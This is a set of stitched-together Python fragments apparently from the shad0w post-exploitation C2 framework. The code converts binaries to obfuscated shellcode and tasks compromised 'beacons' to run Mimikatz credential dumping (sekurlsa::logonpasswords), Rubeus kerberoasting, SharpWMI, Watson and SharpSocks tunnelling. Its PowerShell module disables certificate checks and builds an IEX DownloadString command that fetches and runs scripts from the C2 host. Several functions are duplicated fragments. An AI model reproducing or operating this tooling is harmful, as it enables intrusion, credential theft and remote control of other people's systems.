def run(self, shad0w):
# give a message to the user
if self.args.param is None:
shad0w.debug.log(f"Executing: {''.join(self.args.file)}", log=True)
file = ''.join(self.args.file)
params = None
else:
shad0w.debug.log(
f"Executing: \"{''.join(self.args.file)} {' '.join(self.args.param)}\"",
log=True)
file = ''.join(self.args.file)
params = ' '.join(self.args.param)
# make sure we are in the users current dir
b4dir = os.getcwd()
os.chdir("/root/shad0w/.bridge")
# do we have arguments to pass to the function?
if params is not None:
b64_comp_data = shellcode.generate(file, self.args, params)
else:
b64_comp_data = shellcode.generate(file, self.args, None)
if b64_comp_data is None:
return
# change the dir back
os.chdir(b4dir)
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID,
b64_comp_data)
# inform the user of the change
shad0w.debug.log(f"Tasked beacon ({shad0w.current_beacon})", log=True)
def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=False, donut=True, srdi=False):
# use donut or srdi to extract the shellcode from
# our newly created beacon
if donut and not srdi:
# use donut to get it
if want_base64 is False:
code = shellcode.generate(beacon_file, None, None, parse=False)
elif want_base64 is True:
code = base64.b64encode(shellcode.generate(beacon_file, None, None, parse=False)).decode()
if srdi:
# use srdi to get the shellcode
# flags to pass the loader
flags = 0
# null out the pe header
flags |= 0x1
# obfusicate the imports, with no delay
flags = flags | 0x4 | 0 << 16
if want_base64 is False:
code = shellcode.generate_srdi(beacon_file, flags)
elif want_base64 is True:
code = base64.b64encode(shellcode.generate_srdi(beacon_file, flags)).decode()
return code
def extract_shellcode(beacon_file="/root/shad0w/beacon/beacon.exe", want_base64=False):
# use donut to extract the shellcode from
# our newly created beacon
# use donut to get it
if want_base64 is False:
code = shellcode.generate(beacon_file, None, None, parse=False)
elif want_base64 is True:
code = base64.b64encode(shellcode.generate(beacon_file, None, None, parse=False)).decode()
return code
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
watson_args = ' '.join(args[1:])
# kind of a hack to make sure we integrate nice with the shellcode generator
args = DummyClass()
if len(watson_args) != 0:
args.param = watson_args
else:
args.param = False
watson_args = False
args.cls = False
args.method = False
args.runtime = False
args.appdomain = False
# Generate Donut base64 shellcode with "AnyCpu" as target, local bin is x86
b64_comp_data = shellcode.generate(WATSON_BIN, args, watson_args)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = watson_callback
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
return
sharpwmi_args = ' '.join(args[1:])
# kinda a hack to make sure we intergrate nice with the shellcode generator
args = DummyClass()
if len(sharpwmi_args) != 0:
args.param = sharpwmi_args
else:
args.param = False
sharpwmi_args = False
args.cls = False
args.method = False
args.runtime = False
args.appdomain = False
b64_comp_data = shellcode.generate(SHARPWMI_BIN, args, sharpwmi_args)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID,
b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = sharpwmi_callback
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
return
# usage examples
usage_examples = """
rubeus -x kerberoast
rubeus -x klist
rubeus -x dump
rubeus -x tgtdeleg
rubeus -x help
"""
# init argparse
parse = argparse.ArgumentParser(
prog='rubeus',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
# set the args
parse.add_argument("-x",
"--execute",
nargs='+',
required=True,
help="Rubeus command to execute")
# make sure we dont die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# show the errors to the user
if not args.execute:
print(error_list)
parse.print_help()
return
if args.execute:
params = ' '.join(args.execute)
# kinda a hack to make sure we intergrate nice with the shellcode generator
args.param = args.execute
args.cls = False
args.method = False
args.runtime = False
args.appdomain = False
b64_comp_data = shellcode.generate(RUBEUS_BIN, args, params)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID,
b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = rubeus_callback
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
return
# usage examples
usage_examples = """
Examples:
mimikatz
mimikatz -x coffee
mimikatz -x sekurlsa::logonpasswords
"""
# init argparse
parse = argparse.ArgumentParser(prog='mimikatz',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
# set the args
parse.add_argument("-x", "--execute", nargs='+', required=True, help="Mimikatz command to execute")
parse.add_argument("-n", "--no-exit", action="store_true", required=False, help="Leave mimikatz running")
# make sure we dont die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# show the errors to the user
if not args.execute:
print(error_list)
parse.print_help()
return
if args.execute:
params = ' '.join(args.execute)
if not args.no_exit:
params = params + " exit"
# kinda a hack to make sure we intergrate nice with the shellcode generator
args.param = args.execute
args.cls = False
args.method = False
args.runtime = False
args.appdomain = False
b64_comp_data = shellcode.generate(MIMIKATZ_BIN, args, params)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = mimikatz_callback
def extract_shellcode():
# use donut to extract the shellcode from
# our newly created beacon
beacon_file = "/root/shad0w/beacon/beacon.exe"
# use donut to get it
code = shellcode.generate(beacon_file, None, None, parse=False)
return code
def run(self, shad0w):
if self.args.execute:
params = ' '.join(self.args.execute)
# kinda a hack to make sure we intergrate nice with the shellcode generator
self.args.param = self.args.execute
self.args.cls = False
self.args.method = False
self.args.runtime = False
self.args.appdomain = False
b64_comp_data = shellcode.generate(RUBEUS_BIN, self.args, params)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = rubeus_callback
def set_and_send(shad0w, args):
args.cls = False
args.method = False
args.runtime = False
args.appdomain = False
# generate the shellcode
b64_comp_data = shellcode.generate(RUBEUS_BIN, args, args.param)
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = ghostinthelogs_callback
# inform the user of the change
shad0w.debug.log(f"Tasked beacon ({shad0w.current_beacon})", log=True)
return
def main(shad0w, args):
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
return
# usage examples
usage_examples = """
Examples:
execute -f msg.exe -p hello world
execute -f msg.exe -c MyClass -m RunProcess -r v3
execute -f msg.dll
execute -f msg.js
"""
# init argparse
parse = argparse.ArgumentParser(
prog='execute',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
# set the args
parse.add_argument(
"-f",
"--file",
nargs='+',
required=True,
help=".NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory"
)
parse.add_argument("-p",
"--param",
nargs='+',
required=False,
help="Arguments to run the file with")
parse.add_argument("-c",
"--cls",
required=False,
help="Class name. Is required for .NET DLL")
parse.add_argument(
"-m",
"--method",
required=False,
help="Method or API name for DLL. Is required for .NET DLL")
parse.add_argument(
"-r",
"--runtime",
required=False,
help=
"CLR runtime version. MetaHeader used by default or v4.0.30319 if none available"
)
parse.add_argument(
"-a",
"--appdomain",
required=False,
help="AppDomain name to create for .NET. Randomly generated by default."
)
# make sure we dont die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# show the errors to the user
if ERROR:
print(error_list)
parse.print_help()
return
# give a message to the user
if args.param is None:
shad0w.debug.log(f"Executing: {''.join(args.file)}", log=True)
file = ''.join(args.file)
params = None
else:
shad0w.debug.log(
f"Executing: \"{''.join(args.file)} {' '.join(args.param)}\"",
log=True)
file = ''.join(args.file)
params = ' '.join(args.param)
# make sure we are in the users current dir
b4dir = os.getcwd()
os.chdir("/root/shad0w/.bridge")
# do we have arguments to pass to the function?
if params != None:
b64_comp_data = shellcode.generate(file, args, params)
elif params == None:
b64_comp_data = shellcode.generate(file, args, None)
if b64_comp_data == None:
return
# change the dir back
os.chdir(b4dir)
# set a task for the current beacon to do
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID,
b64_comp_data)
# inform the user of the change
shad0w.debug.log(f"Tasked beacon ({shad0w.current_beacon})", log=True)
return
def main(shad0w, args):
global EXEC_SHARPSOCKS
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon", log=True)
return
# save the raw args
raw_args = args
# usage examples
usage_examples = """
Examples:
sharpsocks -q
sharpsocks --kill
sharpsocks server -l http://*:http-port-to-bind -s *:socks-port-to-bind
sharpsocks client -s http://your.redirector:port/ -k key
"""
parse = argparse.ArgumentParser(
prog='sharpsocks',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep argparse behaving nice
parse.exit = exit
parse.error = error
parse.add_argument("server", help="Control the SharpSocks server")
parse.add_argument("client", help="Control the SharpSocks client")
parse.add_argument(
"-q",
"--quick",
action='store_true',
help="Create a socks tunnel between the C2 and the client")
parse.add_argument("-v",
"--verbose",
action='store_true',
help="Verbose output")
parse.add_argument("--kill",
action='store_true',
help="Kill the socks tunnel")
# make sure we dont die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# make sure we have an argument
if (len(raw_args) == 1):
parse.print_help()
return
shad0w.sharpsocks_verbose = False
if args.verbose:
shad0w.sharpsocks_verbose = True
if args.kill:
kill_server()
return
if args.quick:
http_listen_addr = f"*:8080"
key = start_sharpsocks_server(http_listen=http_listen_addr)
if key == None:
print("Failed to start server")
return
threading.Thread(target=await_for_socks_start, args=(shad0w, )).start()
sharpsocks_cmd_line = f"-s http://{shad0w.endpoint} -k {key}"
args.param = sharpsocks_cmd_line
EXEC_SHARPSOCKS = True
if args.server == "server":
cmdline = ' '.join(raw_args[2:])
start_sharpsocks_server(quick=False, cmd_line=cmdline)
return
if args.server == "client":
args.param = ' '.join(raw_args[2:])
EXEC_SHARPSOCKS = True
if EXEC_SHARPSOCKS:
args.cls = False
args.method = False
args.runtime = False
args.appdomain = False
b64_comp_data = shellcode.generate(sharpsocks_BIN, args, args.param)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID,
b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = sharpsocks_callback
async def main(shad0w, args):
global ERROR
# save the raw args
raw_args = args
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.error("ERROR: No active beacon")
return
# usage examples
usage_examples = """
Examples:
whoami
whoami --all
whoami --privs
whoami --groups
"""
parse = argparse.ArgumentParser(
prog='whoami',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
# setup the args
parse.add_argument("-a",
"--all",
action='store_true',
help="Show all avalible infomation")
parse.add_argument("-p",
"--privs",
action='store_true',
help="Show all privilages")
parse.add_argument("-g",
"--groups",
action='store_true',
help="Show all groups the user is a member of")
# make sure we dont die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# the user might have just run 'ls' but if not lets fail
if (not len(raw_args) == 1) and (not raw_args == "whoami"):
if ERROR:
ERROR = False
print(error_list)
parse.print_help()
return
# this will change to args to args for whoami
data = get_whoami_args(args)
# work around for the stager bug
# make the json
# data = {"op" : OPCODE_WHOAMI, "args": data}
# print(data)
# data = json.dumps(data)
# set a task for the current beacon to do
# shad0w.beacons[shad0w.current_beacon]["callback"] = whoami_callback
# shad0w.beacons[shad0w.current_beacon]["task"] = (EXEC_ID, data)
# do we have arguments to pass to the function?
file = "/root/shad0w/bin/whoami.x64.exe"
# rcode = buildtools.extract_shellcode(beacon_file=file, want_base64=True)
if len(data) != 0:
rcode = base64.b64encode(
shellcode.generate(file, None, data, parse=False)).decode()
elif len(data) == 0:
rcode = base64.b64encode(
shellcode.generate(file, None, None, parse=False)).decode()
shad0w.beacons[shad0w.current_beacon]["callback"] = whoami_callback
shad0w.beacons[shad0w.current_beacon]["task"] = (TMP_EXEC_ID, rcode)
def main(shad0w, args):
raw_args = args
# check we actually have a beacon
if shad0w.current_beacon is None:
shad0w.debug.log("ERROR: No active beacon.", log=True)
return
# usage examples
usage_examples = """
Examples:
psh Get-Process
psh -c Get-Process
psh -m PowerView -c Get-NetUser
psh -m GetHash,PowerUp -c Invoke-AllChecks; Invoke-GetHash
psh --list
psh --info GetHash
"""
# init argparse
parse = argparse.ArgumentParser(prog='psh',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=usage_examples)
# keep it behaving nice
parse.exit = exit
parse.error = error
# set the possible arguments
parse.add_argument("-c", "--command", nargs="+", required=False, help="Powershell command to execute")
parse.add_argument("-m", "--module", required=False, help="Powershell modules to load")
parse.add_argument("-l", "--list", required=False, action='store_true', help="List all the available modules")
parse.add_argument("-i", "--info", required=False, help="Get information on a module")
# make sure we don't die from weird args
try:
args = parse.parse_args(args[1:])
except:
pass
# show the errors to the user
if len(raw_args) == 1:
print(error_list)
parse.print_help()
return
# kind of a hack to make sure we integrate nice with the shellcode generator
donut_args = DummyClass()
psh_args = ""
if args.info:
basedir = "/root/shad0w/scripts/"
args.info = args.info + ".ps1"
if args.info not in os.listdir(basedir):
shad0w.debug.error(f"No module with name '{args.info}'")
return
os.system(f"less {basedir + args.info}")
return
if args.list:
modules = os.listdir("/root/shad0w/scripts")
shad0w.debug.log(f"{len(modules)} available modules\n", log=True)
for module in modules:
print("-\t", module.replace(".ps1", ""))
return
if args.module:
modules = args.module.split(',')
psh_args += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; "
for module in modules:
module_path = f"/root/shad0w/scripts/{module}.ps1"
with open(module_path, "r") as file:
mod_data = file.read()
serve_path = "/" + random_string()
shad0w.debug.log(f"Hosting module '{module}' ({len(mod_data)} bytes) => {serve_path}", log=True)
shad0w.beacons[shad0w.current_beacon]["serve"][serve_path] = mod_data
iex = f"IEX(New-Object System.Net.WebClient).DownloadString(\"https://{shad0w.endpoint}{serve_path}\"); "
psh_args += iex
if args.command:
cmd = ' '.join(raw_args[raw_args.index("-c") + 1:])
psh_args += cmd
donut_args.param = False
donut_args.cls = False
donut_args.method = False
donut_args.runtime = False
donut_args.appdomain = False
psh_args = encode_string(psh_args).decode()
write_args(psh_args)
compile_binary()
b64_comp_data = shellcode.generate(PSH_BIN, donut_args, None)
shad0w.beacons[shad0w.current_beacon]["task"] = (USERCD_EXEC_ID, b64_comp_data)
shad0w.beacons[shad0w.current_beacon]["callback"] = psh_callback